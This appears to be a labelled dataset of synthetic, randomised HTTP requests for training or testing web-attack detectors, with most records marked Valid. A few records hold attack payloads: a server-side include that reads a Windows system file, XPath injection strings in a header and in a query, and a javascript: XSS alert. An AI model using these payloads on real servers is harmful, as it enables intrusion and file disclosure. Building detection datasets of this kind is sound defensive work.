Referer: http://thnadetr.fr/Rlawm/shy7aaoT/knl8oto/6ftudbo/sehcstnt.cgi
TE: trailers,chunked
Trailer: Proxy-Authorization
User-Agent: tJP0b2n http://www.Llpi5t.biz
UA-CPU: Sparc
UA-Disp: 7194,078,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 830x020
Via: 7.2 21.154.160.191, 1.4 www.su0ortlt.htm:7
Transfer-Encoding: deflate
Upgrade: rcbt/8.5, asrs/2.2, wsnl/5.1, trldRe/2.1
Warning: 310 236.101.41.30 "heS1" "Tue, 01 Aug 06 04:08:43 UTC"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 912151407
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 42111
Start - Id: 24493
class: Valid
GET /tGS1tqjek/obpYD_WV-4/LqEc-IchavingF4DUJej/tszattnradigqmi/hi1IeRVd8TVWU0os/oVKVom5/nTeB9tf6LMm8I.tiff?M61hBSI=%3Dasdrop%5C&abeaIw3nbLhe=+oBat%3At-7ftud%7Chetm&uttzwgddihgo=rRl&hiuiSsedf=837&Demeogrqnnnuua=+ew6%25na&tekdueelsthc=70&LqfcdformTTVT=432137&ThNhij=%5C%3Ao&intto=rqgFt2&Riee=lr&oelhoaoaues=26974764&setez=dropavr+&ttr=Let&jwlnnisz=+hoQnetcatmi%28bhome HTTP/1.1
Host: 113.28.29.142
Connection: close
Accept: video/mpeg, audio/*;q=0.8
Accept-Charset: euc-tw, shift_jis, utf-8;q=0.5, iso-8859-6;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=03
Client-ip: 139.18.16.97
Cookie: eesctfaen=0898;PIr5dt=dnmpmoo;yglw=mosOoa1fcc24;4itnfq=l=or-;v05esdl=m
Cookie2: $Version="241"
Date: Fri, 03 Apr 09 19:15:39 CET
ETag: "RCoDfi8cw9gTDD1Xc"
Expect: 100-continue
From: grtsaui@oahrelty.gov
If-Modified-Since: Tue, 25 Nov 08 16:22:06 UTC
If-Unmodified-Since: Thu, 01 Apr 10 21:58:27 CET
If-Match: *
If-None-Match: "CudTdNSArQwRUyalHm"
If-Range: "@YJHQ64e8XRKd6z"
Max-Forwards: 3857
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic YmRoczc6d3Rvcw==
Authorization: tihe6 rpvb=e63etgvr
Range: -7
Referer: /weau/eeet2nlc.msf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/7.3 (X11; U; Open BSD i586 8.8; 2e-an; rv:9.2.5) Gecko/17210471
UA-CPU: Sparc
UA-Disp: 9148,760,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 0451x999
Via: 1.0 7.154.240.243, HTTP/0.9 46.248.248.246
Transfer-Encoding: dso2; weeedl=delEku4w
Upgrade: sem/4.3, wo5ey/5.5, nzioc/1.6
Warning: 067 181.89.226.75 "tdonimnv7ju2Go" 
X-Forwarded-For: 150.103.175.246
X-Serial-Number: 1822359440389
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24493
Start - Id: 21415
class: Valid
GET /ndsq8/9hql1stngqeat4ynn/eSI8dWN/uPo604hinoRqPDV/ypTnxK5/ufP8B2h7KOF_8MeZRN6/aynb6tose/odaion/t5YAFt7.dll?rY8hhth3leku=2TxAPklroa&s1oto=c%24ae&hY=poohc9Aqptfheoa HTTP/1.0
Host: www.zoscvctt.it:80
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 255.170.108.35
Cookie: s8eousghgss0=scripti;8dbueegsoT37n=1d?ayb2;myks=iA62F1PDMpx.
Cookie2: $Version="1"
Date: Fri, 13 Mar 09 05:12:50 UTC
ETag: "lQurpWdSyUb3BcSKkDPs"
Expect: tncy=sngf6a
From: s97aa@bEgmrdes.biz
If-Modified-Since: Tue, 10 Oct 06 18:15:30 GMT
If-Unmodified-Since: Sun, 17 Aug 08 13:11:23 UTC
If-Match: *
If-None-Match: "Xa@MkwqEVRPSRvd2INk."
If-Range: *
Max-Forwards: 036
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest realm
Range: 9389-552,913284-,86-
Referer: http://s5hat.gov/iuAo/TA8xygpd.asp
TE: trailers,chunked;q=0.6
Trailer: Max-Forwards
User-Agent: Mozilla/4.2 (X11; U; Unix 2.0; tn-ok; rv:5.4.7) Gecko/15292667
UA-CPU: Sparc
UA-Disp: 6376,0383,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 528x4272
Via: 4.3 139.58.207.84, 7.1 www.oyin.gif, 8.6 201.172.208.189:573
Transfer-Encoding: identity
Upgrade: O9a1kz/8.8, oleC/5.4, shee/7.3
Warning: 217 7.232.161.211 "en9ruae" 
X-Forwarded-For: 62.14.229.148
X-Serial-Number: 2418413
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21415
Start - Id: 29012
class: Valid
GET /5e/jpdhkiert0Taclvnse/hap5lreibYguppat/eFito4o5e/htx2exrtk/8Ahmo/baagnhiueyh4cghvss/f28Iaeetokro4srhE/sS-dnA3IoggYyJkhkH.n.nsf?bem8ee2=h HTTP/1.1
Host: www.natnnh6n.de
Connection: keep-alive
Accept: audio/x-wav;q=0.1, audio/basic;q=0.0, audio/*
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, deflate;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 36.180.210.251
Cookie: ecechg=795;1E2c3mwp-=3uRwDwhyzktieC;.oEPwp-4oMG=8|eselect;ii=572026;7xrtonMasNrU=1225982
Cookie2: $Version="422"
Date: Thu, 24 Mar 05 15:56:27 UTC
ETag: W/"5G1CsBdFle22Xtr"
Expect: 100-continue
From: e8z2rsr@hhsecdIax.be
If-Modified-Since: Mon, 20 Nov 06 18:56:53 UTC
If-Unmodified-Since: Fri, 30 Dec 05 21:56:02 UTC
If-Match: *
If-None-Match: "MGME.zGjFdDRsbpu"
If-Range: *
Max-Forwards: 97
MIME-Version: 2.4
Pragma: uWnNk=sqc
Proxy-Authorization: Basic b29pdDo0dnQ2ek9t
Authorization: Basic Y2JuaTpTczhvemE=
Range: 2318-,-7
Referer: http://www.iuinB5.st/51I7bml/i5hd/vsN0to/urhncssi/n9tjoO.zip
TE: trailers,chunked;q=0.2,trailers
Trailer: If-Range
User-Agent: Luaen/7.4.6
UA-CPU: x86
UA-Disp: 023,422,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 694x8428
Via: 6.9 8.251.112.210
Transfer-Encoding: compress
Upgrade: rpq0t/1.3, h5yess/6.6
Warning: 848 www.1zbi.js "tteneag" 
X-Forwarded-For: 234.170.143.94
X-Serial-Number: 055751373307057
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29012
Start - Id: 15550
class: Valid
GET /vtSX0_qav8/eEDEwZhshutdownok5W7home/6JkFb/eac9e8sltEadoaoieoqv/daney1oretuhmhSnEe/stfos9etshrn9ryd/aubefsclm/HKHFlmHps/exIAy.q/o2aniorjldisowpps.html?ewngs=uzOunionl%2Fa&uvhhpRqdeRs=243&bG@ak=hgxp_f%24isuel&haidq5se=8327722&gEtuiSea=aCJ%40rz%40m&ian6ctihg5t=leeacdu&ulw=eh&tsalsd=3095189&OSlmICq=b+oee&rRie4ounGtc46=nfrUs&aeacelnocl=dX9&jtjetxt=Te%3A&hthefoOn6e=2&1cSeiodRtonieea=42468204 HTTP/1.0
Host: www.0rlNts.com
Connection: ttetatt
Accept: video/*;q=0.0
Accept-Charset: windows-1250
Accept-Encoding: gzip, compress, compress;q=0.0, deflate, compress;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 97.239.232.84
Cookie: nirr3h3=input\eN;cesHaed=6765798726;d2ka=eXcraY
Cookie2: $Version="420"
Date: Mon, 05 Jul 04 01:39:47 CET
ETag: "Cqt5eE91-djhUSQE"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Thu, 21 Sep 06 21:10:08 GMT
If-Unmodified-Since: Sun, 15 Jun 08 13:35:52 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2894
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Basic aXRubmVoMTp3OXNzcmli
Authorization: Basic ZHRzdDpvdmhv
Range: 1-622060
Referer: /aemiwo/neaJeitt.mspx
TE: trailers,trailers
Trailer: Expect
User-Agent: u_ypbv2dsm http://www.ntlJ2ut.cz
UA-CPU: x86
UA-Disp: 8876,6331,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5730x198
Via: 9.3 205.88.121.35, FTP/9.2 238.16.0.115
Transfer-Encoding: compress
Upgrade: 2oio/9.9, zoEb/6.5, rBf/9.8, 1rfose/4.7, 4mlc/0.6
Warning: 995 www.oigsc.css "fWumtNl" "Sat, 03 Oct 09 14:38:14 UTC"
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 4557726217620382027
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15550
Start - Id: 40389
class: SSI
GET /wTDEK9rELA./t2CpD/eGsn/rcpp-1Zg0s/DjeEIeyidopeneRH/tPkbK@ijks5.sh?IKkS6J1XxpositionNz=46473&StDi5xa=057&7aehid=bSstoegnitZeBole&in47t=05989472&yjPJEwinntECDo=aic1n&meta7ftpetc5Wz5_droplx=a%5Cr&xORfromBrgP=+winntsdeH&iovkr6s=%25m+Mgmelocation%7Ec&t5=ln&2onra=e%3Bwv%29 HTTP/1.1
Host: www.AcwbeS.st
Connection: close
Accept: text/xml, application/rtf;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: swdtts-ps, ddteem-lLAs;q=0.7
Cache-Control: no-store
Cookie: dtnsd=00572812;likeDAVzsmailb=ae1mueBYSq;2damojetiiIUku=<!--    #include  virtual="c:\winnt\system.ini"   -->;fZy.8PC6@Am=dfbw 5h$tusr;dE=beiasc;aoi=eJAqbpw
Cookie2: $Version="21"
Date: Mon, 30 Jul 07 19:01:05 UTC
ETag: W/"LiLmWEgpGe@shEm"
If-Modified-Since: Sat, 25 Aug 07 14:32:39 CET
If-Unmodified-Since: Sun, 10 Jan 10 22:08:09 CET
If-Match: *
Max-Forwards: 6
Pragma: no-cache
Authorization: NTLM bG9vYUZ5dGkzMkVobG9hT21lRWVvZmV0MXRjeDdMdGRsZXF0dXltbm9hdHNzYQ==
Referer: http://acrtiiv.st/eoooi0/Om8E/qteohins/eotlet4/rgrt.sh
User-Agent: ayaeOhi
Transfer-Encoding: rnayc; msa31h=rcpfbbs
Upgrade: tehanE/0.1
Warning: 018 184.41.72.161 "iigaeuoTeon5st" 
----: --------------

null

End - Id: 40389
Start - Id: 35476
class: XPathInjection
GET /r@/are/WgscriptkN/idJXSsZ9PG7EUb/6puycehuCnecmlabr/emee/A0wesAryhdi/nFy/dwoe4nrmss.asp?ulCeol24j4eJuIt=t%3Ek%5Dt%7ED2Plinkha&sgXr7lmoi=aoviulocationformwgetei2iie&2ktntstrnrte=feo%3Blrneaau&pnhaiaknyo=04337&Qt1rR=waggkgx&C6X25fu=h.q&wheeuwt=iyBflinktte&sAhgr=nDs7xeaoe6m&Yrts=vo-ua&E8rshhauhse3=030&e1srAoceterne=q HTTP/1.0
Host: www.tltebiEwxt.com
Connection: keep-alive
Accept: image/*;q=0.8, application/*, audio/*;q=0.8
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: oqeszLb'   or  count(  path/child::node()[position(  )=(( i    +j    +k + l +  1)]   |   path/child::*()[position()=(k+1)])=1  or  'eaiItv'   =' pjyiebt'    or
Cache-Control: gtbcrD='tbnts2lt'
Client-ip: 59.239.90.47
Cookie: tWoghfulits=gohzm2TA5
Cookie2: $Version="42"
Date: Mon, 21 Sep 09 15:44:08 GMT
ETag: W/"8kE08l2MEJ9HkO6"
Expect: 100-continue
From: djepela@Ereu.st
If-Modified-Since: Wed, 08 Aug 07 02:04:51 CET
If-Unmodified-Since: Tue, 10 Apr 07 03:02:06 GMT
If-Match: *
If-None-Match: ".dgSZX4FqE7N2XCKf"
If-Range: "UqLtyWee9A0mveZ"
Max-Forwards: 3790
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: aisd RhjLhrht=aojbCnu
Authorization: NTLM ejFubWVlZWNyNm5sOGVoN3NmZXJmbnBlY1NvNXFpcmZjZXl1ZWhu
Range: 6-
Referer: /Olcdi/c5le/eddei/0zbO.gz
TE: trailers,gzip;q=0.4,trailers
Trailer: Upgrade
User-Agent: Mozilla/8.6 (compatible; Konqueror/7.1; Linux i386; eahnwlI)
UA-CPU: x86
UA-Disp: 1801,706,8
UA-Color: color8
Via: FTP/5.1 www.t1relnfe.jpg:6738
Transfer-Encoding: nhhqnE; smEhr=6Bhpnnvc
Warning: 084 www.rse4aa.htm "nhtTetlnisasnnesic" "Thu, 10 May 07 21:23:05 UTC"
X-Forwarded-For: 140.122.154.142

null

End - Id: 35476
Start - Id: 13350
class: Valid
GET /a9qr@R4a6QIMM1i6SUKf/8o.DL80/8e.cgi?mtzloord=fiO&a4onotmdatqoEjo=fu&Aipjht=ye5s HTTP/1.0
Host: www.bqeadtkffk.fr:06839
Connection: close
Accept: application/x-tar
Accept-Charset: gb2312;q=0.9, koi8-r;q=0.0
Accept-Encoding: compress, identity;q=0.0, deflate
Accept-Language: totn5-OdJf;q=0.7, ssasRm-eoi
Cache-Control: no-transform
Client-ip: 220.98.24.23
Cookie: zryztrzbsoireuw=4981612;8u=httmps;1_unionMZinsertRwhttps9@=lrgHL_m
Cookie2: $Version="1"
Date: Tue, 01 Nov 05 10:03:35 UTC
ETag: "htwtWnHtKtmMXHTq2Qe"
Expect: ieioeir=Edsrt
From: tlCawc@aOrt.gov
If-Modified-Since: Sat, 14 Jun 08 10:41:27 CET
If-Unmodified-Since: Wed, 31 Oct 07 14:45:13 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Mar 10 16:08:38 GMT
Max-Forwards: 3388
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: NTLM eDhhbmZTaGE0bWFqbmV1ckQxc2V1YWxpZU9rdnRnc3JPNnMzaTMzbWI=
Authorization: Digest nc=adea45e2
Range: 65-12,864719-469359
Referer: http://www.deose.uk/toge.asp
TE: chunked;q=0.7,trailers
Trailer: Expect
User-Agent: ctqatg
UA-CPU: x86
UA-Disp: 537,5554,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 643x366
Via: 0.1 171.187.67.15
Transfer-Encoding: compress
Upgrade: sdnNlu/3.0, lm9eS/0.7, 8706/7.7, 5ase/6.3
Warning: 350 www.YfEsvph.shtml "g1siOyhac" 
X-Forwarded-For: 11.178.147.8
X-Serial-Number: 581499383802447
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13350
Start - Id: 49181
class: XPathInjection
GET /dg36fVIiKtLb7/5_M6osbWHk/aAsd9eNtePdb3/fnfe/fLM/tC955yV-Shth35TS4.msf?GdeleteWxUGEy=s&ribodyL-bc_z=75048++or+++++ecAcp%2Feeh%2FSsee%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D0%5D+or+++++36797%3D HTTP/1.1
Host: www.arrhurSr.net:80
Connection: G2hae
Accept: text/xml;q=0.2, audio/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.7, gzip;q=0.6, compress;q=0.7
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 192.197.118.16
Cookie: a27xhnztn=931495197;NTuiheos7Ve=sixofym ae;3g=O4h;St=eyveboot.inijb
Cookie2: $Version="19"
Date: Thu, 03 May 07 07:28:37 GMT
ETag: "fZ.qZvrffsa7UroMMk-R"
Expect: 100-continue
From: ir0psea@aO25fruan.gov
If-Modified-Since: Wed, 25 Feb 09 09:12:45 UTC
If-Unmodified-Since: Sat, 24 Jun 06 14:14:35 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 31 Jul 07 20:49:30 GMT
Max-Forwards: 99
MIME-Version: 6.2
Pragma: Nideha=ash
Proxy-Authorization: Basic bnRlbHdoZXc6bnRpZQ==
Authorization: NTLM ZDB0NThybHNoMmFyZ2VIcmloaUVhWGVvb2VBbmNlbmVq
Range: 87-,-69535,7135-70843
Referer: http://www.pFnOb.it/rrsa.png
TE: trailers,gzip;q=0.2
Trailer: Date
User-Agent: dpgrhtahc (isXRIh; i4v.223Wd; eEcz3ai)
UA-CPU: x86
UA-Disp: 577,972,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 400x881
Via: bmmz/2.3 136.253.216.236, h8ioe/3.8 www.p5heR9a.htm:12, 0.6 252.226.222.33
Transfer-Encoding: gzip
Upgrade: q8iste/1.0, ici/0.5, qtyr3/1.9, oea/6.5, h1e5st/7.2
Warning: 858 www.efhrohf.jpg "oIntdrztcn98" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 6850092
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49181
Start - Id: 8674
class: Valid
GET /jte6rlashr/zs.html?TottEf=14033101&roshhuhnuqUhken=67931 HTTP/1.1
Host: 108.161.158.225
Connection: DnAptn9g
Accept: */*;q=0.0
Accept-Charset: macintosh, koi8;q=0.0, gb2312
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 139.7.102.37
Cookie: tdnntGi9lt3t1b=el;ebodyREU5ZPpsRV=uierr e(-svsenph-h1v;o5o=36;of=6fiwlT;fo4aXnanlienf7m=3536782;iinEG=itZRTPH4-a
Cookie2: $Version="07"
Date: Thu, 29 Jun 06 23:37:08 GMT
ETag: "iY9VMKxeuws3lNflAJKJ"
Expect: 100-continue
From: Xsnt@ceTo3y.it
If-Modified-Since: Thu, 21 Sep 06 07:22:21 GMT
If-Unmodified-Since: Fri, 24 Oct 08 17:46:36 UTC
If-Match: *
If-None-Match: "83GHmH_0jY@qzvF"
If-Range: "1.kIhHuaBABfsMlPp"
Max-Forwards: 7307
MIME-Version: 9.3
Pragma: s0snare='Lwl5e'
Proxy-Authorization: Digest response="DbdAB10dA04Cb5E87ec2504c6CDbdbE0"
Authorization: Digest realm
Range: -766,58-986789
Referer: http://www.ogk0F4ow.fr/hMsisrl.shtml
TE: trailers,gzip,chunked;q=0.6
Trailer: Referer
User-Agent: Mozilla/2.6 (compatible; Konqueror/1.5; Solaris; u1ehsv; tNsaohIajh; fNrowNr)
UA-CPU: MIPS
UA-Disp: 953,263,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 8393x485
Via: FTP/9.6 211.16.111.84, 4.0 119.242.24.211
Transfer-Encoding: compress
Upgrade: eswo/1.2, 2shets/0.9, Ic4/7.0
Warning: 173 52.61.224.109 "iicxlea7tnjtatQp" 
X-Forwarded-For: 46.202.68.176
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 8674
Start - Id: 146
class: Valid
GET /sPBK51V/iIcopy-F_4XphpLTmailczp/e_qHoTdwcN4x3iw257V.css?uiawi=5294138&f7eha6i=56&L0Esevfmrshi=89394211&7oehnorr=betweenOa&UjgflK=d6u.2wmDCBN HTTP/1.0
Host: 94.232.228.152:25
Connection: close
Accept: */*
Accept-Charset: windows-1251;q=0.9, x-mac-greek
Accept-Encoding: *
Accept-Language: l2-db;q=0.9, 6lmnngee-Onttnysw
Cache-Control: max-age=1
Client-ip: 42.172.74.137
Cookie: Woya=lc1q_ti.La
Cookie2: $Version="7"
Date: Tue, 30 Oct 07 20:38:38 CET
ETag: W/"SRmbQGNVW5iNXBP"
Expect: dhsaemqM=3Fntaibo
From: yiboT07e@nnhseug2l.org
If-Modified-Since: Wed, 04 May 05 17:42:00 GMT
If-Unmodified-Since: Wed, 11 Jan 06 02:19:51 UTC
If-Match: "ELvysSOjNl0bNK.OcZ"
If-None-Match: "pAlj9m.4J1bGflUz"
If-Range: "nSjtrGV8Fvbj5qSuD"
Max-Forwards: 5
MIME-Version: 6.1
Pragma: Tateh='enQrn7'
Proxy-Authorization: NTLM ZWhCaGFoOUZlZXNOZW5pOWRkNHRtOG9sbHNkZXNRaUdlUg==
Authorization: NTLM aWV0ZnlxbWVvZXRjdjRkY3JuYWVlVHVjaHNlZXVlczVuc0k1N2s=
Range: 964-,534023-,-60428
Referer: /reizy/ghandet/seb3d.tar.gz
TE: gzip
Trailer: Accept
User-Agent: ntsZerr (rPu9nVSS.; t9GuyvUp7s; 5_u1zFp8A; lyNoaRD; 3kiZA4Cb)
UA-CPU: PowerPC
UA-Disp: 1257,262,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 167x694
Via: fye7/2.4 57.21.246.118, 5.4 151.94.135.49, FTP/0.6 www.eadat.jpg:7
Transfer-Encoding: 3etnro
Upgrade: 3ilhh/7.5, sclai/5.5, chnnyw/6.6, nlh/5.8, Fmk/0.2
Warning: 154 www.hcosnooA.png "taactmae" "Thu, 01 Oct 09 07:27:56 GMT"
X-Forwarded-For: 22.86.234.213
X-Serial-Number: 3449007851195603
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 146
Start - Id: 47792
class: XSS
GET /r90tpa0rSreeoeTMie/reXJXCl/gdGGgA8-n9/el/0iTmEp/R6NEstyleT6/imNKBQ4Ah91/eoO.6h.OWmqC0/raeetaglusc/swwcoouer1nrNrpsA609.jsp?ya=javascript%3A++alert+++%28++++%22+++roek6s.36lcua%22%29&tdoiesumzpNtek=%3B%291n6 HTTP/1.1
Host: www.twsoryeheq.net:10
Connection: close
Accept: video/mpeg
Accept-Charset: x-mac-arabic;q=0.0, iso-8859-6;q=0.3
Accept-Encoding: gzip;q=0.2, deflate;q=0.4, identity;q=0.7, identity;q=0.8
Accept-Language: ueepea-r
Cache-Control: only-if-cached
Client-ip: 235.195.152.232
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="10"
Date: Wed, 15 Jul 09 02:51:13 GMT
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: 100-continue
From: dRkiaeue@o6si.cz
If-Modified-Since: Sun, 05 Aug 07 03:09:18 CET
If-Unmodified-Since: Mon, 17 Jan 05 07:53:36 UTC
If-Match: *
If-None-Match: "d6BRANSFN99dGsRj"
If-Range: "yVm2SX9bAjtG2XZN.5"
Max-Forwards: 1
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest username="oaid"
Authorization: 9moa lbh0=lnmeeet
Range: 712490-
Referer: http://utrE.cz/enfh/wud0/nitereih/fsJslamr/augn.mp3
TE: gzip,gzip,gzip
Trailer: Accept-Language
User-Agent: Mozilla/8.3 (X11; U; SunOS sun4u 2.9; te-em; rv:4.0.8) Gecko/97054464
UA-CPU: x86
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 876x886
Via: FTP/6.6 221.109.192.7
Transfer-Encoding: compress
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47792
Start - Id: 16963
class: Valid
GET /6Nz-0qLEjewA3ZsK/9H2awz/rtro4agguoyateWjeuq/dhaving-nxtermQ90Kn9xFYN/206RojiXKq0iUQkHs0JW/oztuhsidQl9oB/iFt.cgi?eodeano13ue=da6oe9veipo0T%3Et&dii=rVnc&hAsuntcstohHb0=75&teeEDoHfS=Lke8lf0hsls&9728CbNF=idcretTa4iioed HTTP/1.0
Host: 220.46.142.78:31
Connection: keep-alive
Accept: video/*;q=0.3, audio/basic
Accept-Charset: *
Accept-Encoding: gzip, identity;q=0.5, gzip;q=0.7, identity;q=0.2, compress
Accept-Language: azo-U;q=0.3
Cache-Control: no-cache
Client-ip: 209.111.122.120
Cookie: 8tnrvett5z7jl=Eh+rQeEqbodyea;ztttm=vqKysQ4
Cookie2: $Version="72"
Date: Sun, 23 Sep 07 18:02:50 GMT
ETag: W/"4Kup4QLCScUMVBaUb"
Expect: 100-continue
From: adqTnemz@inishn.ch
If-Modified-Since: Wed, 07 May 08 17:16:44 UTC
If-Unmodified-Since: Thu, 14 Jul 05 09:32:03 CET
If-Match: "Qk7lAY2ulo1rXnNu2c"
If-None-Match: *
If-Range: *
Max-Forwards: 0
MIME-Version: 9.9
Pragma: tn=iaertB
Proxy-Authorization: 0N9cpr nregcI0a=lzil
Authorization: Digest opaque="irombpO"
Range: 26-084
Referer: http://www.mpr5estI.ch/ikss/iadn/tt0rptwV/satutstt/oenie.jsp
TE: gzip;q=0.9,gzip
Trailer: Trailer
User-Agent: Mozilla/7.6 (Windows; U; Windows NT 7.2; se-bd; rv:5.1.3) Gecko/78791121
UA-CPU: 68000
UA-Disp: 704,5793,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 6606x753
Via: lbia/8.9 58.149.126.106, 7.5 www.aMQ4exk.htm
Transfer-Encoding: gzip
Upgrade: dmEs/2.6, 33oae/3.4
Warning: 236 www.kteDei.png "aaNzovzy59eaipao" 
X-Forwarded-For: 234.74.157.132
X-Serial-Number: 44944819
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16963
Start - Id: 19617
class: Valid
GET /dz.5xVPOdQ6w7mZNU7.php?siYRF@JUpo=lsQehebetnritm&pmB7K.5=aoTil HTTP/1.1
Host: 131.239.244.38
Connection: keep-alive
Accept: */*
Accept-Charset: isiri-3342;q=0.3, gb2312;q=0.4
Accept-Encoding: deflate, compress;q=0.1
Accept-Language: *
Cache-Control: i0r='axeishpn'
Client-ip: 146.158.107.168
Cookie: ge=4538;aHdedouami=actc9Iehatatmo;8Krcpsulogwinnt_3IDy=4080234831;eEote=anantdaais
Cookie2: $Version="32"
Date: Wed, 19 Jul 06 06:15:06 GMT
ETag: "lY39hBZrtusU6IIrLCSV"
Expect: rteasasb
From: widc@tloe.fr
If-Modified-Since: Fri, 16 Nov 07 13:06:12 CET
If-Unmodified-Since: Sun, 11 Apr 04 03:20:51 UTC
If-Match: "F-khJHljpe7FVuA2"
If-None-Match: "cs5K8SvmgEYF1bmO0e"
If-Range: Fri, 19 May 06 17:30:25 GMT
Max-Forwards: 971
MIME-Version: 1.6
Pragma: sgg5nr='IBtV9p'
Proxy-Authorization: hnwc eonohrme=eToyi
Authorization: lderk 1ltee=slanil
Range: 1-,85-73,-62568
Referer: /epatsa.mdb
TE: trailers,chunked
Trailer: Cache-Control
User-Agent: Mozilla/7.3 (Machintosh; U; PPC 1.6; 09-un; rv:0.7.2) Gecko/79109723
UA-CPU: x86
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: 5.6 www.O5nyj.css, 9.5 www.Biu1dnb.htm
Transfer-Encoding: hesfS; EdvntisN=luhnat
Upgrade: emf/6.5
Warning: 871 www.cnhAnst.jpg "iceNks8t" 
X-Forwarded-For: 165.100.124.216
X-Serial-Number: 84453733272881684848
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19617
Start - Id: 13544
class: Valid
GET /iP1h_szecJh5aC9y/7winntPGQHbt/-img59/lashkl/yeiwfheti3roi/1n.dIPIbGU/t4E7/nmn51ettte/uimgwEL-I/dr6tigvn7rr.dll?FgNXY9MMIgW=715554&twedioTv4lrOyOu=mZgEuc6Os&rowuvalnffzw=th%5C5nlikea%40smUuhddaaccept+q HTTP/1.1
Host: 187.172.56.252
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6
Accept-Encoding: *
Accept-Language: 6tnsq9-orSgR7S, 31NO-En9tiiin;q=0.8, 7-4, e-eWyc0rxp, eIvan-pleli;q=0.4
Cache-Control: no-store
Client-ip: 134.114.129.144
Cookie: rbih=dne;ndnrdstpe=leor;rolm=1835812;J460CG=70dz a2tlZaeyQgz|t;hueoiRto=awkFQrJ
Cookie2: $Version="91"
Date: Sun, 05 Aug 07 22:21:25 GMT
ETag: W/"Tz31ZF5nQCkgNnyc"
Expect: 100-continue
From: AjrbGa@6tEJsir.cz
If-Modified-Since: Sun, 15 Oct 06 06:28:23 UTC
If-Unmodified-Since: Tue, 28 Apr 09 10:38:07 CET
If-Match: *
If-None-Match: *
If-Range: "IH2zKmZe27tcJFh7J5tM"
Max-Forwards: 9531
MIME-Version: 9.1
Pragma: heso='urot'
Proxy-Authorization: easre atnA=isiejuv
Authorization: NTLM ZW1xb3plcGJ2b3IyaW5wd25vY29hMWViaDBjbGFpNnd0YWJvOUo4dHZPc29YaWM=
Range: 91-168
Referer: http://xntask.com/IDE73haw/ui4altT/zirny/zncShe.conf
TE: chunked;q=0.4,trailers
Trailer: Accept-Language
User-Agent: Mozilla/3.9 (Windows; U; Win98 3.9; bz-ae; rv:8.0.1) Gecko/32845083
UA-CPU: MIPS
UA-Disp: 1899,114,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1988x830
Via: 7.9 www.Hwoeqns.css, HTTP/5.9 223.172.157.255:31956
Transfer-Encoding: compress
Upgrade: aon/3.5, vnn/6.0, TohiyS/5.0, sxhL/6.8
